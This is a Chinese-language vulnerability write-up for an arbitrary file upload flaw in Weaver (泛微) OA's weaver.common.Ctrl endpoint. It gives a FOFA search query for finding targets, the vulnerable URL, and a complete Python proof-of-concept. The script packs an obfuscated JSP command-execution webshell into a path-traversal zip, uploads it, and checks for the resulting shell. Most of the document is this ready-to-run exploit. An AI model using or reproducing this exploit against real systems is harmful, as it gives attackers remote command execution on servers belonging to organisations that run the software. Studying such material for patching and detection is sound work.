泛微OA weaver.common.Ctrl 任意文件上传漏洞

漏洞描述

泛微OA weaver.common.Ctrl 存在任意文件上传漏洞,攻击者通过漏洞可以上传webshell文件控制服务器

漏洞影响

泛微OA

FOFA

FOFA: app="泛微-协同办公OA"

漏洞复现

存在漏洞的路径为:

  1. /weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp

POC

  1. import zipfile
  2. import random
  3. import sys
  4. import requests
  5. def generate_random_str(randomlength=16):
  6. random_str = ''
  7. base_str = 'ABCDEFGHIGKLMNOPQRSTUVWXYZabcdefghigklmnopqrstuvwxyz0123456789'
  8. length = len(base_str) - 1
  9. for i in range(randomlength):
  10. random_str += base_str[random.randint(0, length)]
  11. return random_str
  12. mm = generate_random_str(8)
  13. webshell_name1 = mm+'.jsp'
  14. webshell_name2 = '../../../'+webshell_name1
  15. def file_zip():
  16. shell = """<%@ page contentType="text/html;charset=UTF-8" language="java" %>
  17. <%@ page import="sun.misc.BASE64Decoder" %>
  18. <%
  19. if(request.getParameter("cmd")!=null){
  20. BASE64Decoder decoder = new BASE64Decoder();
  21. Class rt = Class.forName(new String(decoder.decodeBuffer("amF2YS5sYW5nLlJ1bnRpbWU=")));
  22. Process e = (Process)
  23. rt.getMethod(new String(decoder.decodeBuffer("ZXhlYw==")), String.class).invoke(rt.getMethod(new
  24. String(decoder.decodeBuffer("Z2V0UnVudGltZQ=="))).invoke(null, new
  25. Object[]{}), request.getParameter("cmd") );
  26. java.io.InputStream in = e.getInputStream();
  27. int a = -1;
  28. byte[] b = new byte[2048];
  29. out.print("<pre>");
  30. while((a=in.read(b))!=-1){
  31. out.println(new String(b));
  32. }
  33. out.print("</pre>");
  34. }
  35. %>
  36. """ ## 替换shell内容
  37. zf = zipfile.ZipFile(mm+'.zip', mode='w', compression=zipfile.ZIP_DEFLATED)
  38. zf.writestr(webshell_name2, shell)
  39. def GetShell(urllist):
  40. file_zip()
  41. print('上传文件中')
  42. urls = urllist + '/weaver/weaver.common.Ctrl/.css?arg0=com.cloudstore.api.service.Service_CheckApp&arg1=validateApp'
  43. file = [('file1', (mm+'.zip', open(mm + '.zip', 'rb'), 'application/zip'))]
  44. requests.post(url=urls,files=file,timeout=60, verify=False)
  45. GetShellurl = urllist+'/cloudstore/'+webshell_name1
  46. GetShelllist = requests.get(url = GetShellurl)
  47. if GetShelllist.status_code == 200:
  48. print('利用成功webshell地址为:'+GetShellurl)
  49. else:
  50. print('未找到webshell利用失败')
  51. def main():
  52. if (len(sys.argv) == 2):
  53. url = sys.argv[1]
  54. GetShell(url)
  55. else:
  56. print("python3 poc.py http://xx.xx.xx.xx")
  57. if __name__ == '__main__':
  58. main()